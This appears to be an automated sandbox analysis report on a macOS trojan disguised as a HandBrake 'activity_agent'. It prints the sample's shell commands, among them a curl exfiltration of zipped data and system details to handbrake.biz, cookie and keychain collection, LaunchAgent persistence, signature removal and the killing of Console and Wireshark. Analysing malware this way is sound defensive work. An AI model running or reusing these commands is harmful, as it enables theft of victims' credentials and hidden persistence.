Source: /bin/sh (PID: 664)Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /bin/sh (PID: 665)Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/Info_.plist /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
Source: /bin/sh (PID: 666)Shell process: mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/fr.handbrake.activity_agent.plist /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 669)Shell process: curl -s -F full_name=vreni -F username=vreni -F password= -F root_password=failure -F serial=C07N355HDWYL -F hostname=vreni%E2%80%99s Mac mini -F signed=0 -F file=@/Users/vreni/Library/VideoFrameworks/proton.zip -F api_key=9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57ea -F cts=1494347197 -F signature=77aa1c7aafbc61542eb30c0f1a1cb7f29c68adcaf5dbaa73561688d648c4f7b6 https://handbrake.biz/api/init
Source: /bin/sh (PID: 670)Shell process: touch /Users/vreni/Library/VideoFrameworks/.ptrun
Source: /bin/sh (PID: 673)Shell process: sed -i -e s/P_MBN/fr.handbrake.activity_agent/g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 674)Shell process: sed -i -e s=P_UPTH=/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent=g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 675)Shell process: chmod 644 /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 676)Shell process: codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app
Source: /bin/sh (PID: 678)Shell process: rm -rf /Users/vreni/Library/RenderFiles/activity_agent.app/Ic*
Source: /bin/sh (PID: 679)Shell process: launchctl load /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 680)Shell process: killall Console
Source: /bin/sh (PID: 681)Shell process: killall Wireshark
Source: /bin/sh (PID: 682)Shell process: rm -rf /Users/vreni/Desktop/unpack/activity_agent.app
Reads local browser cookies
Source: /usr/bin/zip (PID: 655)Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 659)Killall command executed: killall Console
Source: /bin/sh (PID: 660)Killall command executed: killall Wireshark
Source: /bin/sh (PID: 680)Killall command executed: killall Console
Source: /bin/sh (PID: 681)Killall command executed: killall Wireshark
Writes Mach-O files to unusual directories
Source: /bin/cp (PID: 663)64-bit Mach-O written to unusual path: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/libexec/DeveloperTools/codesign_allocate (PID: 677)64-bit Mach-O written to unusual path: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp

Hooking and other Techniques for Hiding and Protection:

Denies being traced/debugged (via ptrace PT_DENY_ATTACH)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)PTRACE system call (PT_DENY_ATTACH): PID 579 denies future traces
Explicitly terminates console (used for log message viewing) processes
Source: /bin/sh (PID: 659)Kills 'Console' processes: killall Console
Source: /bin/sh (PID: 680)Kills 'Console' processes: killall Console
Explicitly terminates network capturing processes
Source: /bin/sh (PID: 660)Kills 'Wireshark' processes: killall Wireshark
Source: /bin/sh (PID: 681)Kills 'Wireshark' processes: killall Wireshark
Moves itself during installation or deletes itself after installation
Source: /usr/bin/zip (PID: 627)File deleted: /Users/vreni/Library/VideoFrameworks/KC.zip
Source: /usr/bin/zip (PID: 627)File moved: /Users/vreni/Library/VideoFrameworks/zihaRvzn -> /Users/vreni/Library/VideoFrameworks/KC.zip
Source: /usr/bin/zip (PID: 655)File deleted: /Users/vreni/Library/VideoFrameworks/SF.zip
Source: /usr/bin/zip (PID: 655)File moved: /Users/vreni/Library/VideoFrameworks/ziSznLAI -> /Users/vreni/Library/VideoFrameworks/SF.zip
Source: /usr/bin/zip (PID: 658)File deleted: /Users/vreni/Library/VideoFrameworks/proton.zip
Source: /usr/bin/zip (PID: 658)File moved: /Users/vreni/Library/VideoFrameworks/ziHyh3w6 -> /Users/vreni/Library/VideoFrameworks/proton.zip
Source: /bin/mv (PID: 664)File moved: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent -> /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/bin/codesign (PID: 676)File moved: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp -> /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent

HIPS / PFW / Operating System Protection Evasion:

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: kern.safeboot (1.66)
Executes the "codesign" command used to create and manipulate code signatures
Source: /bin/sh (PID: 676)Codesign executable: /usr/bin/codesign -> codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app

Language, Device and Operating System Detection:

Reads the system or server version plist file
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Reads hardware related sysctl values
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.ncpu (6.3)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: hw.availcpu (6.25)
Reads the kernel OS version value
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579)Sysctl read request: kern.osversion (1.65)
Reads the systems OS release and/or type
Source: /usr/bin/curl (PID: 586)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 597)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 669)Sysctl requested: kern.osrelease (1.2)
Reads the systems hostname
Source: /bin/sh (PID: 580)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 582)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 584)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 588)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 589)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 589)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 590)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 592)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 594)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 595)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 598)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 599)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 603)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 605)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 608)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 610)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 612)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 614)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 616)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 618)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 620)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 622)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 624)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 631)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 637)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 643)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 649)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 662)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 667)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 670)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 671)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 672)Sysctl requested: kern.hostname (1.10)

Stealing of Sensitive Information:

May steal keychain information which contains credentials
Source: /usr/bin/zip (PID: 627)Keychain directory enumerated: /Users/vreni/Library/Keychains
Source: /usr/bin/zip (PID: 627)Keychain directory enumerated: /Library/Keychains


Runtime Messages

Command:open
Exitcode:0
Killed:False
Standard Output:
Standard Error:

Yara Overview

No Yara matches

Startup

  • system is mac1
  • xpcproxy (PID: 579 PPID: 1 MD5: d68b4c6f2056c73e1d3bd228bcd6d4ff)
  • activity_agent (PID: 579 PPID: 1 Overlayed Process Image: xpcproxy MD5: 6a2d0c8b20efc3fa283176a4bc76d6fd)
    • sh (PID: 580 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 581 PPID: 580 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • openssl (PID: 581 PPID: 580 Overlayed Process Image: sh MD5: 1689d18d1f1b7b07480d337cc7fc9f43)
    • sh (PID: 582 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 583 PPID: 582 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • nc (PID: 583 PPID: 582 Overlayed Process Image: sh MD5: 2cbc307230ad7cd8050109ea4f2bd078)
    • sh (PID: 584 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 585 PPID: 584 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 586 PPID: 585 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • curl (PID: 586 PPID: 585 Overlayed Process Image: sh MD5: 313ae871e04221163541c8af134351dc)
    • sh (PID: 588 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sh (PID: 589 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sudo (PID: 589 PPID: 579 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
    • sh (PID: 590 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 591 PPID: 590 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 592 PPID: 590 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sudo (PID: 592 PPID: 590 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
        • sudo (PID: 593 PPID: 592 MD5: 7d986f7707c0f11264989cd7105ea80d)
        • echo (PID: 593 PPID: 592 Overlayed Process Image: sudo MD5: 28aaba1826ce568b1eec9cf71ad0655c)
    • sh (PID: 594 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sh (PID: 595 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 596 PPID: 595 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 597 PPID: 596 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • curl (PID: 597 PPID: 596 Overlayed Process Image: sh MD5: 313ae871e04221163541c8af134351dc)
    • sh (PID: 598 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • openssl (PID: 598 PPID: 579 Overlayed Process Image: sh MD5: 1689d18d1f1b7b07480d337cc7fc9f43)
    • sh (PID: 599 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 600 PPID: 599 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 600 PPID: 599 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 603 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 604 PPID: 603 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 604 PPID: 603 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 605 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 606 PPID: 605 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 606 PPID: 605 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 608 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 609 PPID: 608 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 609 PPID: 608 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 610 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 611 PPID: 610 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 611 PPID: 610 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 612 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 613 PPID: 612 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 613 PPID: 612 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 614 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 615 PPID: 614 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 615 PPID: 614 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 616 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 617 PPID: 616 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 617 PPID: 616 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 618 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 619 PPID: 618 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 619 PPID: 618 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 620 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 621 PPID: 620 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 621 PPID: 620 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 622 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 623 PPID: 622 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 623 PPID: 622 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 624 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 625 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • mkdir (PID: 625 PPID: 624 Overlayed Process Image: sh MD5: 00efa095a9110a312bf9115afb361764)
      • sh (PID: 626 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • chmod (PID: 626 PPID: 624 Overlayed Process Image: sh MD5: ecb64579c6dd0ebee31bf8e4d4cdcc6e)
      • sh (PID: 627 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 627 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 628 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 628 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 629 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 629 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 630 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 631 PPID: 630 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 631 PPID: 630 Overlayed Process Image: sh MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 632 PPID: 631 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • grep (PID: 632 PPID: 631 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
          • sh (PID: 633 PPID: 631 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 634 PPID: 633 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • grep (PID: 634 PPID: 633 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
            • sh (PID: 635 PPID: 633 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sed (PID: 635 PPID: 633 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 636 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 637 PPID: 636 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 637 PPID: 636 Overlayed Process Image: sh MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 638 PPID: 637 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • grep (PID: 638 PPID: 637 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
          • sh (PID: 639 PPID: 637 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 640 PPID: 639 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • grep (PID: 640 PPID: 639 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
            • sh (PID: 641 PPID: 639 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sed (PID: 641 PPID: 639 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 642 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 643 PPID: 642 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 643 PPID: 642 Overlayed Process Image: sh MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 644 PPID: 643 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • grep (PID: 644 PPID: 643 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
          • sh (PID: 645 PPID: 643 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 646 PPID: 645 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • grep (PID: 646 PPID: 645 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
            • sh (PID: 647 PPID: 645 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sed (PID: 647 PPID: 645 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 648 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 649 PPID: 648 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 649 PPID: 648 Overlayed Process Image: sh MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • sh (PID: 650 PPID: 649 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • grep (PID: 650 PPID: 649 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
          • sh (PID: 651 PPID: 649 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sh (PID: 652 PPID: 651 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • grep (PID: 652 PPID: 651 Overlayed Process Image: sh MD5: f7fe9c4af9294f2949377a12244b3d60)
            • sh (PID: 653 PPID: 651 MD5: 2cc3c26641112c1bd0173f396b7d7662)
            • sed (PID: 653 PPID: 651 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 654 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 654 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 655 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 655 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 656 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 656 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 657 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 657 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 658 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 658 PPID: 624 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
      • sh (PID: 659 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • killall (PID: 659 PPID: 624 Overlayed Process Image: sh MD5: e27cce82be3cba31a2486d00964d1c5e)
      • sh (PID: 660 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • killall (PID: 660 PPID: 624 Overlayed Process Image: sh MD5: e27cce82be3cba31a2486d00964d1c5e)
      • sh (PID: 661 PPID: 624 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • rm (PID: 661 PPID: 624 Overlayed Process Image: sh MD5: e8926d2347850b76f57a1d5f0226de8b)
    • sh (PID: 662 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 663 PPID: 662 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • cp (PID: 663 PPID: 662 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)
      • sh (PID: 664 PPID: 662 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • mv (PID: 664 PPID: 662 Overlayed Process Image: sh MD5: 7fb694b9a3c7fd27aa7fca81d5afdfeb)
      • sh (PID: 665 PPID: 662 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • mv (PID: 665 PPID: 662 Overlayed Process Image: sh MD5: 7fb694b9a3c7fd27aa7fca81d5afdfeb)
      • sh (PID: 666 PPID: 662 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • mv (PID: 666 PPID: 662 Overlayed Process Image: sh MD5: 7fb694b9a3c7fd27aa7fca81d5afdfeb)
    • sh (PID: 667 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 668 PPID: 667 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 669 PPID: 668 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • curl (PID: 669 PPID: 668 Overlayed Process Image: sh MD5: 313ae871e04221163541c8af134351dc)
    • sh (PID: 670 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • touch (PID: 670 PPID: 579 Overlayed Process Image: sh MD5: 6e95af6ebd7fd2dd9a0e26654024db31)
    • sh (PID: 671 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sh (PID: 672 PPID: 579 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 673 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sed (PID: 673 PPID: 672 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 674 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sed (PID: 674 PPID: 672 Overlayed Process Image: sh MD5: 824cf059686109372fe70bf8d9c320dd)
      • sh (PID: 675 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • chmod (PID: 675 PPID: 672 Overlayed Process Image: sh MD5: ecb64579c6dd0ebee31bf8e4d4cdcc6e)
      • sh (PID: 676 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • codesign (PID: 676 PPID: 672 Overlayed Process Image: sh MD5: 08b2dc5c47c8081db031055901b32ccd)
        • codesign (PID: 677 PPID: 676 MD5: 08b2dc5c47c8081db031055901b32ccd)
        • codesign_allocate (PID: 677 PPID: 676 Overlayed Process Image: codesign MD5: c04b0c53dc3af4effd0731b9663a555d)
        • codesign_allocate (PID: 677 PPID: 676 Overlayed Process Image: codesign_allocate MD5: f0209b39eba8aa88c1e94bb653698641)
      • sh (PID: 678 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • rm (PID: 678 PPID: 672 Overlayed Process Image: sh MD5: e8926d2347850b76f57a1d5f0226de8b)
      • sh (PID: 679 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • launchctl (PID: 679 PPID: 672 Overlayed Process Image: sh MD5: dbfeff92b30d89c0a04dd0fbeb40ae5e)
      • sh (PID: 680 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • killall (PID: 680 PPID: 672 Overlayed Process Image: sh MD5: e27cce82be3cba31a2486d00964d1c5e)
      • sh (PID: 681 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • killall (PID: 681 PPID: 672 Overlayed Process Image: sh MD5: e27cce82be3cba31a2486d00964d1c5e)
      • sh (PID: 682 PPID: 672 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • rm (PID: 682 PPID: 672 Overlayed Process Image: sh MD5: e8926d2347850b76f57a1d5f0226de8b)
  • cleanup

Created / dropped Files

File Path | Type | Malicious
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
  • Type: XML document text
  • Malicious: true
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
  • Type: Mach-O 64-bit executable
  • Malicious: true
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp
  • Type: Mach-O 64-bit executable
  • Malicious: true
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/PkgInfo
  • Type: ASCII text, with no line terminators
  • Malicious: false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/.hash
  • Type: DBase 3 data file
  • Malicious: false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/.tmpdata
  • Type: data
  • Malicious: false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/MainMenu.nib
  • Type: Apple binary property list
  • Malicious: false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/Security.png
  • Type: PNG image, 128 x 128, 8-bit/color RGBA, non-interlaced
  • Malicious: false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/h.icns
  • Type: data
  • Malicious: false
/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/mozilla.sh
  • Type: Bourne-Again shell script text executable
  • Malicious: false
/Users/vreni/Library/VideoFrameworks/.crd
  • Type: ASCII text
  • Malicious: false
/Users/vreni/Library/VideoFrameworks/ziHyh3w6
  • Type: Zip archive data, at least v1.0 to extract
  • Malicious: true
/Users/vreni/Library/VideoFrameworks/ziSznLAI
  • Type: Zip archive data, at least v1.0 to extract
  • Malicious: true
/Users/vreni/Library/VideoFrameworks/zihaRvzn
  • Type: Zip archive data, at least v1.0 to extract
  • Malicious: true
/dev/null
  • Type: ASCII text
  • Malicious: false
/private/tmp/au
  • Type: data
  • Malicious: false
/private/tmp/au.pub
  • Type: ASCII text
  • Malicious: false
/private/tmp/public.pem
  • Type: ASCII text
  • Malicious: false
/private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/C/mds/mdsDirectory.db_
  • Type: Mac OS X Keychain File
  • Malicious: false
/private/var/folders/rz/z4lzdb9n2yg9fdd643nf823w0000gn/C/mds/mdsObject.db_
  • Type: Mac OS X Keychain File
  • Malicious: false

Contacted Domains/Contacted IPs

Contacted Domains

| Name | IP | Active | Malicious |
|---|---|---|---|
| handbrake.biz | 85.17.25.66 | true | true |
| script.google.com | 216.58.204.142 | true | false |
| handbrakestore.com | 146.0.43.101 | true | true |
| script.googleusercontent.com | 216.58.204.129 | true | false |
| qrtfvfysk4bdcwwwe9pxmqe9.com | unknown | unknown | true |
| kjfnbfhu7ndudgzhxpwnnqkc.com | unknown | unknown | true |
| ypu4vwlenkpt29f95etrqllq.com | unknown | unknown | true |
| yaxw8dsbttpwrwlq3h6uc9eq.com | unknown | unknown | true |
| kcdjzquvhsua6hlfbmjzkzsb.com | unknown | unknown | true |
| fyamakgtrrjt9vrwhmc76v38.com | unknown | unknown | true |
| luwenxdsnhgfxckcjgxvtugj.com | unknown | unknown | true |
| 6gmvshjdfpfbeqktpsde5xav.com | unknown | unknown | true |
| handbrake.cc | unknown | unknown | true |

Contacted IPs

| IP | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|
| 8.8.8.8 | United States | 15169 | GoogleInc | false |
| 216.58.204.129 | United States | 15169 | GoogleInc | false |
| 85.17.25.66 | Netherlands | 60781 | LeaseWebBV | false |
| 8.8.4.4 | United States | 15169 | GoogleInc | false |
| 146.0.43.101 | Germany | 24961 | myLocmanagedITAG | false |
| 216.58.204.142 | United States | 15169 | GoogleInc | false |

Static File Info

General

File type:Zip archive data, at least v2.0 to extract
TrID:
  • Mac OS X Application Bundle (25504/1) 86.41%
  • ZIP compressed archive (4004/1) 13.57%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.02%
